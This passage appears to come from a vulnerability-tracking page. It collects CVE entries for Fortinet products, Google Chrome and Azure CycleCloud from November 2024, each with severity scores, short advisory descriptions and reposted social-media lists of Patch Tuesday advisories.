  11. FG-IR-24-205 CVE-2024-36507 (7.3 high) Online Installer DLL Hijacking
  12. FG-IR-24-099 CVE-2024-32116 (5.1 medium) Path traversal vulnerability in CLI commands (FortiAnalyzer)
  13. FG-IR-24-179 CVE-2024-35274 (2.3 low) Path traversal vulnerability leading to file creation (FortiAnalyzer)
  14. FG-IR-24-144 CVE-2024-36513 (8.2 high) Privilege escalation via lua auto patch function (FortiClientWindows)

Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.

#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity

##

CVE-2023-47543
(5.4 MEDIUM)

EPSS: 0.04%

updated 2024-11-13T17:01:16.850000

1 post

An authorization bypass through user-controlled key vulnerability [CWE-639] in Fortinet FortiPortal version 7.0.0 through 7.0.3 allows an authenticated attacker to interact with resources of other organizations via HTTP or HTTPS requests.

screaminggoat@infosec.exchange at 2024-11-12T19:25:40.000Z ##

Happy #PatchTuesday from Fortinet:

  1. FG-IR-24-115 CVE-2024-32117 (4.9 medium) Arbitrary file read in administrative interface (FortiAnalyzer)
  2. FG-IR-24-180 CVE-2024-36509 (4.2 medium) Exposure of password hashes to read-only admin (FortiWeb)
  3. FG-IR-24-022 CVE-2024-40592 (7.5 high) FortiClientMacOS - Missing signature verification
  4. FG-IR-24-032 CVE-2024-26011 (5.3 medium) FortiOS - Improper authentication in fgfmd
  5. FG-IR-23-475 CVE-2023-50176 (7.1 high) FortiOS - SSLVPN session hijacking using SAML authentication
  6. FG-IR-24-125 CVE-2024-33505 (5.6 medium) Heap buffer overflow in httpd (FortiAnalyzer)
  7. FG-IR-23-448 CVE-2023-47543 (5.4 medium) Insecure Direct Object Reference over API endpoints (FortiPortal)
  8. FG-IR-23-267 CVE-2023-44255 (4.1 medium) Lack of capacity to filter logs by administrator access (FortiAnalyzer)
  9. FG-IR-24-199 CVE-2024-47574 (7.8 high) Named Pipes Improper Access Control (FortiClientWindows)
  10. FG-IR-24-116 CVE-2024-32118 (6.7 medium) OS command injection in CLI command (FortiClientWindows)
  11. FG-IR-24-205 CVE-2024-36507 (7.3 high) Online Installer DLL Hijacking
  12. FG-IR-24-099 CVE-2024-32116 (5.1 medium) Path traversal vulnerability in CLI commands (FortiAnalyzer)
  13. FG-IR-24-179 CVE-2024-35274 (2.3 low) Path traversal vulnerability leading to file creation (FortiAnalyzer)
  14. FG-IR-24-144 CVE-2024-36513 (8.2 high) Privilege escalation via lua auto patch function (FortiClientWindows)

Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.

#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity

##

CVE-2024-47574
(7.8 HIGH)

EPSS: 0.04%

updated 2024-11-13T12:32:16

2 posts

An authentication bypass using an alternate path or channel in Fortinet FortiClientWindows version 7.4.0, versions 7.2.4 through 7.2.0, versions 7.0.12 through 7.0.0, and 6.4.10 through 6.4.0 allows a low-privilege attacker to execute arbitrary code with high privilege via spoofed named pipe messages.

jbhall56@infosec.exchange at 2024-11-15T12:53:46.000Z ##

The bug is tracked as CVE-2024-47574, and it earned a 7.8 out of 10 CVSS severity rating. It affects FortiClientWindows version 7.4.0, 7.2.4 through 7.2.0, 7.0.12 through 7.0.0, and 6.4.10 through 6.4.0. Fortinet patched the hole on Tuesday. theregister.com/2024/11/14/for

##

screaminggoat@infosec.exchange at 2024-11-12T19:25:40.000Z ##

Happy #PatchTuesday from Fortinet:

  1. FG-IR-24-115 CVE-2024-32117 (4.9 medium) Arbitrary file read in administrative interface (FortiAnalyzer)
  2. FG-IR-24-180 CVE-2024-36509 (4.2 medium) Exposure of password hashes to read-only admin (FortiWeb)
  3. FG-IR-24-022 CVE-2024-40592 (7.5 high) FortiClientMacOS - Missing signature verification
  4. FG-IR-24-032 CVE-2024-26011 (5.3 medium) FortiOS - Improper authentication in fgfmd
  5. FG-IR-23-475 CVE-2023-50176 (7.1 high) FortiOS - SSLVPN session hijacking using SAML authentication
  6. FG-IR-24-125 CVE-2024-33505 (5.6 medium) Heap buffer overflow in httpd (FortiAnalyzer)
  7. FG-IR-23-448 CVE-2023-47543 (5.4 medium) Insecure Direct Object Reference over API endpoints (FortiPortal)
  8. FG-IR-23-267 CVE-2023-44255 (4.1 medium) Lack of capacity to filter logs by administrator access (FortiAnalyzer)
  9. FG-IR-24-199 CVE-2024-47574 (7.8 high) Named Pipes Improper Access Control (FortiClientWindows)
  10. FG-IR-24-116 CVE-2024-32118 (6.7 medium) OS command injection in CLI command (FortiClientWindows)
  11. FG-IR-24-205 CVE-2024-36507 (7.3 high) Online Installer DLL Hijacking
  12. FG-IR-24-099 CVE-2024-32116 (5.1 medium) Path traversal vulnerability in CLI commands (FortiAnalyzer)
  13. FG-IR-24-179 CVE-2024-35274 (2.3 low) Path traversal vulnerability leading to file creation (FortiAnalyzer)
  14. FG-IR-24-144 CVE-2024-36513 (8.2 high) Privilege escalation via lua auto patch function (FortiClientWindows)

Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.

#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity

##

CVE-2024-11114
(8.4 HIGH)

EPSS: 0.04%

updated 2024-11-13T00:30:48

1 post

Inappropriate implementation in Views in Google Chrome on Windows prior to 131.0.6778.69 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium)

screaminggoat@infosec.exchange at 2024-11-12T19:06:19.000Z ##

Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) and 131.0.6778.69/.70 (Windows, Mac) bring 12 security fixes, 8 of which are externally reported. No mention of exploitation.

  • CVE-2024-11110 (high) Inappropriate implementation in Blink
  • CVE-2024-11111 (medium) Inappropriate implementation in Autofill
  • CVE-2024-11112 (medium) Use after free in Media
  • CVE-2024-11113 (medium) Use after free in Accessibility
  • CVE-2024-11114 (medium) Inappropriate implementation in Views
  • CVE-2024-11115 (medium) Insufficient policy enforcement in Navigation
  • CVE-2024-11116 (medium) Inappropriate implementation in Paint
  • CVE-2024-11117 (low) Inappropriate implementation in FileSystem

#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity

##

CVE-2024-11113
(8.8 HIGH)

EPSS: 0.04%

updated 2024-11-13T00:30:48

1 post

Use after free in Accessibility in Google Chrome prior to 131.0.6778.69 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)

screaminggoat@infosec.exchange at 2024-11-12T19:06:19.000Z ##

Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) and 131.0.6778.69/.70 (Windows, Mac) bring 12 security fixes, 8 of which are externally reported. No mention of exploitation.

  • CVE-2024-11110 (high) Inappropriate implementation in Blink
  • CVE-2024-11111 (medium) Inappropriate implementation in Autofill
  • CVE-2024-11112 (medium) Use after free in Media
  • CVE-2024-11113 (medium) Use after free in Accessibility
  • CVE-2024-11114 (medium) Inappropriate implementation in Views
  • CVE-2024-11115 (medium) Insufficient policy enforcement in Navigation
  • CVE-2024-11116 (medium) Inappropriate implementation in Paint
  • CVE-2024-11117 (low) Inappropriate implementation in FileSystem

#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity

##

CVE-2024-11112
(7.5 HIGH)

EPSS: 0.04%

updated 2024-11-13T00:30:48

1 post

Use after free in Media in Google Chrome on Windows prior to 131.0.6778.69 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)

screaminggoat@infosec.exchange at 2024-11-12T19:06:19.000Z ##

Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) and 131.0.6778.69/.70 (Windows, Mac) bring 12 security fixes, 8 of which are externally reported. No mention of exploitation.

  • CVE-2024-11110 (high) Inappropriate implementation in Blink
  • CVE-2024-11111 (medium) Inappropriate implementation in Autofill
  • CVE-2024-11112 (medium) Use after free in Media
  • CVE-2024-11113 (medium) Use after free in Accessibility
  • CVE-2024-11114 (medium) Inappropriate implementation in Views
  • CVE-2024-11115 (medium) Insufficient policy enforcement in Navigation
  • CVE-2024-11116 (medium) Inappropriate implementation in Paint
  • CVE-2024-11117 (low) Inappropriate implementation in FileSystem

#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity

##

CVE-2024-32117
(4.9 MEDIUM)

EPSS: 0.04%

updated 2024-11-12T21:31:01

1 post

An improper limitation of a pathname to a restricted directory ('Path Traversal') vulnerability [CWE-22] in Fortinet FortiManager version 7.4.0 through 7.4.2 and below 7.2.5, FortiAnalyzer version 7.4.0 through 7.4.2 and below 7.2.5 & FortiAnalyzer-BigData version 7.4.0 and below 7.2.7 allows a privileged attacker to read arbitrary files from the underlying system via crafted HTTP or HTTPS requests

screaminggoat@infosec.exchange at 2024-11-12T19:25:40.000Z ##

Happy #PatchTuesday from Fortinet:

  1. FG-IR-24-115 CVE-2024-32117 (4.9 medium) Arbitrary file read in administrative interface (FortiAnalyzer)
  2. FG-IR-24-180 CVE-2024-36509 (4.2 medium) Exposure of password hashes to read-only admin (FortiWeb)
  3. FG-IR-24-022 CVE-2024-40592 (7.5 high) FortiClientMacOS - Missing signature verification
  4. FG-IR-24-032 CVE-2024-26011 (5.3 medium) FortiOS - Improper authentication in fgfmd
  5. FG-IR-23-475 CVE-2023-50176 (7.1 high) FortiOS - SSLVPN session hijacking using SAML authentication
  6. FG-IR-24-125 CVE-2024-33505 (5.6 medium) Heap buffer overflow in httpd (FortiAnalyzer)
  7. FG-IR-23-448 CVE-2023-47543 (5.4 medium) Insecure Direct Object Reference over API endpoints (FortiPortal)
  8. FG-IR-23-267 CVE-2023-44255 (4.1 medium) Lack of capacity to filter logs by administrator access (FortiAnalyzer)
  9. FG-IR-24-199 CVE-2024-47574 (7.8 high) Named Pipes Improper Access Control (FortiClientWindows)
  10. FG-IR-24-116 CVE-2024-32118 (6.7 medium) OS command injection in CLI command (FortiClientWindows)
  11. FG-IR-24-205 CVE-2024-36507 (7.3 high) Online Installer DLL Hijacking
  12. FG-IR-24-099 CVE-2024-32116 (5.1 medium) Path traversal vulnerability in CLI commands (FortiAnalyzer)
  13. FG-IR-24-179 CVE-2024-35274 (2.3 low) Path traversal vulnerability leading to file creation (FortiAnalyzer)
  14. FG-IR-24-144 CVE-2024-36513 (8.2 high) Privilege escalation via lua auto patch function (FortiClientWindows)

Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.

#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity

##

CVE-2024-26011
(5.3 MEDIUM)

EPSS: 0.04%

updated 2024-11-12T21:31:01

1 post

A missing authentication for critical function in Fortinet FortiManager version 7.4.0 through 7.4.2, 7.2.0 through 7.2.4, 7.0.0 through 7.0.11, 6.4.0 through 6.4.14, FortiPAM version 1.2.0, 1.1.0 through 1.1.2, 1.0.0 through 1.0.3, FortiProxy version 7.4.0 through 7.4.2, 7.2.0 through 7.2.9, 7.0.0 through 7.0.17, 2.0.0 through 2.0.14, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6, 1.0.0 through 1.0.7,

screaminggoat@infosec.exchange at 2024-11-12T19:25:40.000Z ##

Happy #PatchTuesday from Fortinet:

  1. FG-IR-24-115 CVE-2024-32117 (4.9 medium) Arbitrary file read in administrative interface (FortiAnalyzer)
  2. FG-IR-24-180 CVE-2024-36509 (4.2 medium) Exposure of password hashes to read-only admin (FortiWeb)
  3. FG-IR-24-022 CVE-2024-40592 (7.5 high) FortiClientMacOS - Missing signature verification
  4. FG-IR-24-032 CVE-2024-26011 (5.3 medium) FortiOS - Improper authentication in fgfmd
  5. FG-IR-23-475 CVE-2023-50176 (7.1 high) FortiOS - SSLVPN session hijacking using SAML authentication
  6. FG-IR-24-125 CVE-2024-33505 (5.6 medium) Heap buffer overflow in httpd (FortiAnalyzer)
  7. FG-IR-23-448 CVE-2023-47543 (5.4 medium) Insecure Direct Object Reference over API endpoints (FortiPortal)
  8. FG-IR-23-267 CVE-2023-44255 (4.1 medium) Lack of capacity to filter logs by administrator access (FortiAnalyzer)
  9. FG-IR-24-199 CVE-2024-47574 (7.8 high) Named Pipes Improper Access Control (FortiClientWindows)
  10. FG-IR-24-116 CVE-2024-32118 (6.7 medium) OS command injection in CLI command (FortiClientWindows)
  11. FG-IR-24-205 CVE-2024-36507 (7.3 high) Online Installer DLL Hijacking
  12. FG-IR-24-099 CVE-2024-32116 (5.1 medium) Path traversal vulnerability in CLI commands (FortiAnalyzer)
  13. FG-IR-24-179 CVE-2024-35274 (2.3 low) Path traversal vulnerability leading to file creation (FortiAnalyzer)
  14. FG-IR-24-144 CVE-2024-36513 (8.2 high) Privilege escalation via lua auto patch function (FortiClientWindows)

Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.

#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity

##

CVE-2024-40592
(7.6 HIGH)

EPSS: 0.04%

updated 2024-11-12T21:31:01

1 post

An improper verification of cryptographic signature vulnerability [CWE-347] in FortiClient MacOS version 7.4.0, version 7.2.4 and below, version 7.0.10 and below, version 6.4.10 and below may allow a local authenticated attacker to swap the installer with a malicious package via a race condition during the installation process.

screaminggoat@infosec.exchange at 2024-11-12T19:25:40.000Z ##

Happy #PatchTuesday from Fortinet:

  1. FG-IR-24-115 CVE-2024-32117 (4.9 medium) Arbitrary file read in administrative interface (FortiAnalyzer)
  2. FG-IR-24-180 CVE-2024-36509 (4.2 medium) Exposure of password hashes to read-only admin (FortiWeb)
  3. FG-IR-24-022 CVE-2024-40592 (7.5 high) FortiClientMacOS - Missing signature verification
  4. FG-IR-24-032 CVE-2024-26011 (5.3 medium) FortiOS - Improper authentication in fgfmd
  5. FG-IR-23-475 CVE-2023-50176 (7.1 high) FortiOS - SSLVPN session hijacking using SAML authentication
  6. FG-IR-24-125 CVE-2024-33505 (5.6 medium) Heap buffer overflow in httpd (FortiAnalyzer)
  7. FG-IR-23-448 CVE-2023-47543 (5.4 medium) Insecure Direct Object Reference over API endpoints (FortiPortal)
  8. FG-IR-23-267 CVE-2023-44255 (4.1 medium) Lack of capacity to filter logs by administrator access (FortiAnalyzer)
  9. FG-IR-24-199 CVE-2024-47574 (7.8 high) Named Pipes Improper Access Control (FortiClientWindows)
  10. FG-IR-24-116 CVE-2024-32118 (6.7 medium) OS command injection in CLI command (FortiClientWindows)
  11. FG-IR-24-205 CVE-2024-36507 (7.3 high) Online Installer DLL Hijacking
  12. FG-IR-24-099 CVE-2024-32116 (5.1 medium) Path traversal vulnerability in CLI commands (FortiAnalyzer)
  13. FG-IR-24-179 CVE-2024-35274 (2.3 low) Path traversal vulnerability leading to file creation (FortiAnalyzer)
  14. FG-IR-24-144 CVE-2024-36513 (8.2 high) Privilege escalation via lua auto patch function (FortiClientWindows)

Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.

#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity

##

CVE-2024-23666
(7.5 HIGH)

EPSS: 0.04%

updated 2024-11-12T21:30:54

1 post

A client-side enforcement of server-side security in Fortinet FortiAnalyzer-BigData at least version 7.4.0 and 7.2.0 through 7.2.6 and 7.0.1 through 7.0.6 and 6.4.5 through 6.4.7 and 6.2.5, FortiManager version 7.4.0 through 7.4.1 and 7.2.0 through 7.2.4 and 7.0.0 through 7.0.11 and 6.4.0 through 6.4.14, FortiAnalyzer version 7.4.0 through 7.4.1 and 7.2.0 through 7.2.4 and 7.0.0 through 7.0.11 an

screaminggoat@infosec.exchange at 2024-11-13T14:12:42.000Z ##

Additional Fortinet security advisories:

  1. FG-IR-23-396 CVE-2024-23666 (7.5 high) Readonly users could run some sensitive operations (FortiAnalyzer)
  2. FG-IR-24-033 CVE-2024-33510 (4.3 medium) SSLVPN WEB UI Text injection (FortiOS/FortiProxy)
  3. FG-IR-24-098 CVE-2024-31496 (6.7 medium) Stack buffer overflow in CLI command (FortiAnalyzer/FortiManager)
  4. FG-IR-22-155 CVE-2024-40590 (4.8 medium) missing digital certificate validation (FortiPortal)

No mention of exploitation.

#Fortinet #PatchTuesday #CVE #vulnerability #infosec #cybersecurity

##

CVE-2024-36507
(7.3 HIGH)

EPSS: 0.05%

updated 2024-11-12T21:30:53

1 posts

An untrusted search path in Fortinet FortiClientWindows versions 7.4.0, versions 7.2.4 through 7.2.0, versions 7.0.12 through 7.0.0 allows an attacker to run arbitrary code via DLL hijacking and social engineering.

screaminggoat@infosec.exchange at 2024-11-12T19:25:40.000Z ##

Happy #PatchTuesday from Fortinet:

  1. FG-IR-24-115 CVE-2024-32117 (4.9 medium) Arbitrary file read in administrative interface (FortiAnalyzer)
  2. FG-IR-24-180 CVE-2024-36509 (4.2 medium) Exposure of password hashes to read-only admin (FortiWeb)
  3. FG-IR-24-022 CVE-2024-40592 (7.5 high) FortiClientMacOS - Missing signature verification
  4. FG-IR-24-032 CVE-2024-26011 (5.3 medium) FortiOS - Improper authentication in fgfmd
  5. FG-IR-23-475 CVE-2023-50176 (7.1 high) FortiOS - SSLVPN session hijacking using SAML authentication
  6. FG-IR-24-125 CVE-2024-33505 (5.6 medium) Heap buffer overflow in httpd (FortiAnalyzer)
  7. FG-IR-23-448 CVE-2023-47543 (5.4 medium) Insecure Direct Object Reference over API endpoints (FortiPortal)
  8. FG-IR-23-267 CVE-2023-44255 (4.1 medium) Lack of capacity to filter logs by administrator access (FortiAnalyzer)
  9. FG-IR-24-199 CVE-2024-47574 (7.8 high) Named Pipes Improper Access Control (FortiClientWindows)
  10. FG-IR-24-116 CVE-2024-32118 (6.7 medium) OS command injection in CLI command (FortiClientWindows)
  11. FG-IR-24-205 CVE-2024-36507 (7.3 high) Online Installer DLL Hijacking
  12. FG-IR-24-099 CVE-2024-32116 (5.1 medium) Path traversal vulnerability in CLI commands (FortiAnalyzer)
  13. FG-IR-24-179 CVE-2024-35274 (2.3 low) Path traversal vulnerability leading to file creation (FortiAnalyzer)
  14. FG-IR-24-144 CVE-2024-36513 (8.2 high) Privilege escalation via lua auto patch function (FortiClientWindows)

Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.

#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity

##

CVE-2024-31496
(6.7 MEDIUM)

EPSS: 0.04%

updated 2024-11-12T21:30:52

1 posts

A stack-based buffer overflow vulnerability [CWE-121] in Fortinet FortiManager version 7.4.0 through 7.4.2 and before 7.2.5, FortiAnalyzer version 7.4.0 through 7.4.2 and before 7.2.5 and FortiAnalyzer-BigData 7.4.0 and before 7.2.7 allows a privileged attacker to execute unauthorized code or commands via crafted CLI requests.

screaminggoat@infosec.exchange at 2024-11-13T14:12:42.000Z ##

Additional Fortinet security advisories:

  1. FG-IR-23-396 CVE-2024-23666 (7.5 high) Readonly users could run some sensitive operations (FortiAnalyzer)
  2. FG-IR-24-033 CVE-2024-33510 (4.3 medium) SSLVPN WEB UI Text injection (FortiOS/FortiProxy)
  3. FG-IR-24-098 CVE-2024-31496 (6.7 medium) Stack buffer overflow in CLI command (FortiAnalyzer/FortiManager)
  4. FG-IR-22-155 CVE-2024-40590 (4.8 medium) missing digital certificate validation (FortiPortal)

No mention of exploitation.

#Fortinet #PatchTuesday #CVE #vulnerability #infosec #cybersecurity

##

CVE-2024-33510
(4.3 MEDIUM)

EPSS: 0.04%

updated 2024-11-12T21:30:52

1 posts

An improper neutralization of special elements in output used by a downstream component ('Injection') vulnerability [CWE-74] in FortiOS version 7.4.3 and below, version 7.2.8 and below, version 7.0.16 and below; FortiProxy version 7.4.3 and below, version 7.2.9 and below, version 7.0.16 and below; FortiSASE version 24.2.b SSL-VPN web user interface may allow a remote unauthenticated attacker to pe

screaminggoat@infosec.exchange at 2024-11-13T14:12:42.000Z ##

Additional Fortinet security advisories:

  1. FG-IR-23-396 CVE-2024-23666 (7.5 high) Readonly users could run some sensitive operations (FortiAnalyzer)
  2. FG-IR-24-033 CVE-2024-33510 (4.3 medium) SSLVPN WEB UI Text injection (FortiOS/FortiProxy)
  3. FG-IR-24-098 CVE-2024-31496 (6.7 medium) Stack buffer overflow in CLI command (FortiAnalyzer/FortiManager)
  4. FG-IR-22-155 CVE-2024-40590 (4.8 medium) missing digital certificate validation (FortiPortal)

No mention of exploitation.

#Fortinet #PatchTuesday #CVE #vulnerability #infosec #cybersecurity

##

CVE-2024-32118
(6.7 MEDIUM)

EPSS: 0.04%

updated 2024-11-12T21:30:52

1 posts

Multiple improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerabilities [CWE-78] in Fortinet FortiManager version 7.4.0 through 7.4.2 and before 7.2.5, Fortinet FortiAnalyzer version 7.4.0 through 7.4.2 and before 7.2.5 and Fortinet FortiAnalyzer-BigData before 7.4.0 allow an authenticated privileged attacker to execute unauthorized code or commands via

screaminggoat@infosec.exchange at 2024-11-12T19:25:40.000Z ##

Happy #PatchTuesday from Fortinet:

  1. FG-IR-24-115 CVE-2024-32117 (4.9 medium) Arbitrary file read in administrative interface (FortiAnalyzer)
  2. FG-IR-24-180 CVE-2024-36509 (4.2 medium) Exposure of password hashes to read-only admin (FortiWeb)
  3. FG-IR-24-022 CVE-2024-40592 (7.5 high) FortiClientMacOS - Missing signature verification
  4. FG-IR-24-032 CVE-2024-26011 (5.3 medium) FortiOS - Improper authentication in fgfmd
  5. FG-IR-23-475 CVE-2023-50176 (7.1 high) FortiOS - SSLVPN session hijacking using SAML authentication
  6. FG-IR-24-125 CVE-2024-33505 (5.6 medium) Heap buffer overflow in httpd (FortiAnalyzer)
  7. FG-IR-23-448 CVE-2023-47543 (5.4 medium) Insecure Direct Object Reference over API endpoints (FortiPortal)
  8. FG-IR-23-267 CVE-2023-44255 (4.1 medium) Lack of capacity to filter logs by administrator access (FortiAnalyzer)
  9. FG-IR-24-199 CVE-2024-47574 (7.8 high) Named Pipes Improper Access Control (FortiClientWindows)
  10. FG-IR-24-116 CVE-2024-32118 (6.7 medium) OS command injection in CLI command (FortiClientWindows)
  11. FG-IR-24-205 CVE-2024-36507 (7.3 high) Online Installer DLL Hijacking
  12. FG-IR-24-099 CVE-2024-32116 (5.1 medium) Path traversal vulnerability in CLI commands (FortiAnalyzer)
  13. FG-IR-24-179 CVE-2024-35274 (2.3 low) Path traversal vulnerability leading to file creation (FortiAnalyzer)
  14. FG-IR-24-144 CVE-2024-36513 (8.2 high) Privilege escalation via lua auto patch function (FortiClientWindows)

Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.

#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity

##

CVE-2024-32116
(5.1 MEDIUM)

EPSS: 0.04%

updated 2024-11-12T21:30:52

1 posts

Multiple relative path traversal vulnerabilities [CWE-23] in Fortinet FortiManager version 7.4.0 through 7.4.2 and before 7.2.5, FortiAnalyzer version 7.4.0 through 7.4.2 and before 7.2.5 and FortiAnalyzer-BigData version 7.4.0 and before 7.2.7 allow a privileged attacker to delete files from the underlying filesystem via crafted CLI requests.

screaminggoat@infosec.exchange at 2024-11-12T19:25:40.000Z ##

Happy #PatchTuesday from Fortinet:

  1. FG-IR-24-115 CVE-2024-32117 (4.9 medium) Arbitrary file read in administrative interface (FortiAnalyzer)
  2. FG-IR-24-180 CVE-2024-36509 (4.2 medium) Exposure of password hashes to read-only admin (FortiWeb)
  3. FG-IR-24-022 CVE-2024-40592 (7.5 high) FortiClientMacOS - Missing signature verification
  4. FG-IR-24-032 CVE-2024-26011 (5.3 medium) FortiOS - Improper authentication in fgfmd
  5. FG-IR-23-475 CVE-2023-50176 (7.1 high) FortiOS - SSLVPN session hijacking using SAML authentication
  6. FG-IR-24-125 CVE-2024-33505 (5.6 medium) Heap buffer overflow in httpd (FortiAnalyzer)
  7. FG-IR-23-448 CVE-2023-47543 (5.4 medium) Insecure Direct Object Reference over API endpoints (FortiPortal)
  8. FG-IR-23-267 CVE-2023-44255 (4.1 medium) Lack of capacity to filter logs by administrator access (FortiAnalyzer)
  9. FG-IR-24-199 CVE-2024-47574 (7.8 high) Named Pipes Improper Access Control (FortiClientWindows)
  10. FG-IR-24-116 CVE-2024-32118 (6.7 medium) OS command injection in CLI command (FortiClientWindows)
  11. FG-IR-24-205 CVE-2024-36507 (7.3 high) Online Installer DLL Hijacking
  12. FG-IR-24-099 CVE-2024-32116 (5.1 medium) Path traversal vulnerability in CLI commands (FortiAnalyzer)
  13. FG-IR-24-179 CVE-2024-35274 (2.3 low) Path traversal vulnerability leading to file creation (FortiAnalyzer)
  14. FG-IR-24-144 CVE-2024-36513 (8.2 high) Privilege escalation via lua auto patch function (FortiClientWindows)

Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.

#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity

##

CVE-2023-44255
(4.1 MEDIUM)

EPSS: 0.04%

updated 2024-11-12T21:30:52

1 posts

An exposure of sensitive information to an unauthorized actor [CWE-200] in Fortinet FortiManager before 7.4.2, FortiAnalyzer before 7.4.2 and FortiAnalyzer-BigData before 7.2.5 may allow a privileged attacker with administrative read permissions to read event logs of another ADOM via crafted HTTP or HTTPS requests.

screaminggoat@infosec.exchange at 2024-11-12T19:25:40.000Z ##

Happy #PatchTuesday from Fortinet:

  1. FG-IR-24-115 CVE-2024-32117 (4.9 medium) Arbitrary file read in administrative interface (FortiAnalyzer)
  2. FG-IR-24-180 CVE-2024-36509 (4.2 medium) Exposure of password hashes to read-only admin (FortiWeb)
  3. FG-IR-24-022 CVE-2024-40592 (7.5 high) FortiClientMacOS - Missing signature verification
  4. FG-IR-24-032 CVE-2024-26011 (5.3 medium) FortiOS - Improper authentication in fgfmd
  5. FG-IR-23-475 CVE-2023-50176 (7.1 high) FortiOS - SSLVPN session hijacking using SAML authentication
  6. FG-IR-24-125 CVE-2024-33505 (5.6 medium) Heap buffer overflow in httpd (FortiAnalyzer)
  7. FG-IR-23-448 CVE-2023-47543 (5.4 medium) Insecure Direct Object Reference over API endpoints (FortiPortal)
  8. FG-IR-23-267 CVE-2023-44255 (4.1 medium) Lack of capacity to filter logs by administrator access (FortiAnalyzer)
  9. FG-IR-24-199 CVE-2024-47574 (7.8 high) Named Pipes Improper Access Control (FortiClientWindows)
  10. FG-IR-24-116 CVE-2024-32118 (6.7 medium) OS command injection in CLI command (FortiClientWindows)
  11. FG-IR-24-205 CVE-2024-36507 (7.3 high) Online Installer DLL Hijacking
  12. FG-IR-24-099 CVE-2024-32116 (5.1 medium) Path traversal vulnerability in CLI commands (FortiAnalyzer)
  13. FG-IR-24-179 CVE-2024-35274 (2.3 low) Path traversal vulnerability leading to file creation (FortiAnalyzer)
  14. FG-IR-24-144 CVE-2024-36513 (8.2 high) Privilege escalation via lua auto patch function (FortiClientWindows)

Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.

#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity

##

CVE-2024-35274
(2.3 LOW)

EPSS: 0.04%

updated 2024-11-12T21:30:52

1 posts

An improper limitation of a pathname to a restricted directory ('Path Traversal') vulnerability [CWE-22] in Fortinet FortiAnalyzer versions below 7.4.2, Fortinet FortiManager versions below 7.4.2 and Fortinet FortiAnalyzer-BigData version 7.4.0 and below 7.2.7 allows a privileged attacker with read write administrative privileges to create non-arbitrary files on a chosen directory via crafted CLI

screaminggoat@infosec.exchange at 2024-11-12T19:25:40.000Z ##

Happy #PatchTuesday from Fortinet:

  1. FG-IR-24-115 CVE-2024-32117 (4.9 medium) Arbitrary file read in administrative interface (FortiAnalyzer)
  2. FG-IR-24-180 CVE-2024-36509 (4.2 medium) Exposure of password hashes to read-only admin (FortiWeb)
  3. FG-IR-24-022 CVE-2024-40592 (7.5 high) FortiClientMacOS - Missing signature verification
  4. FG-IR-24-032 CVE-2024-26011 (5.3 medium) FortiOS - Improper authentication in fgfmd
  5. FG-IR-23-475 CVE-2023-50176 (7.1 high) FortiOS - SSLVPN session hijacking using SAML authentication
  6. FG-IR-24-125 CVE-2024-33505 (5.6 medium) Heap buffer overflow in httpd (FortiAnalyzer)
  7. FG-IR-23-448 CVE-2023-47543 (5.4 medium) Insecure Direct Object Reference over API endpoints (FortiPortal)
  8. FG-IR-23-267 CVE-2023-44255 (4.1 medium) Lack of capacity to filter logs by administrator access (FortiAnalyzer)
  9. FG-IR-24-199 CVE-2024-47574 (7.8 high) Named Pipes Improper Access Control (FortiClientWindows)
  10. FG-IR-24-116 CVE-2024-32118 (6.7 medium) OS command injection in CLI command (FortiClientWindows)
  11. FG-IR-24-205 CVE-2024-36507 (7.3 high) Online Installer DLL Hijacking
  12. FG-IR-24-099 CVE-2024-32116 (5.1 medium) Path traversal vulnerability in CLI commands (FortiAnalyzer)
  13. FG-IR-24-179 CVE-2024-35274 (2.3 low) Path traversal vulnerability leading to file creation (FortiAnalyzer)
  14. FG-IR-24-144 CVE-2024-36513 (8.2 high) Privilege escalation via lua auto patch function (FortiClientWindows)

Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.

#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity

##

CVE-2024-43602
(10.0 CRITICAL)

EPSS: 0.05%

updated 2024-11-12T18:31:06

1 posts

Azure CycleCloud Remote Code Execution Vulnerability

